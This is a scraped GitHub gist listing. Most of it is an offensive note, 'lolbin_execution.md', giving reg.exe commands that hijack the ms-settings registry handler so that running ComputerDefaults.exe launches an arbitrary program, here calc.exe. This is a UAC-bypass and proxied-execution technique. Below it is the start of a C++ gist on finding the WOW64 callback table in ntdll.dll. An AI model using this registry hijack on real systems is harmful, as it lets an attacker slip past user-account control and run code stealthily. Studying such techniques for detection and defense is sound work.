Skip to content

Instantly share code, notes, and snippets.

View DeLuks2006's full-sized avatar

DeLuks DeLuks2006

74 followers · 80 following
View GitHub Profile
@havoc3-3
havoc3-3 / lolbin_execution.md
Last active November 7, 2025 05:58
Proxied Execution techniques utilizing registry hijacks.

Proxied Execution using ComputerDefaults.exe using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe

@odzhan
odzhan / wow64.cpp
Last active March 30, 2026 18:02
WOW64 Callbacks
//
// How to locate the WOW64 Callback Table in ntdll.dll
//
// @modexpblog
//
#define PHNT_VERSION PHNT_VISTA
#include <phnt_windows.h>
#include <phnt.h>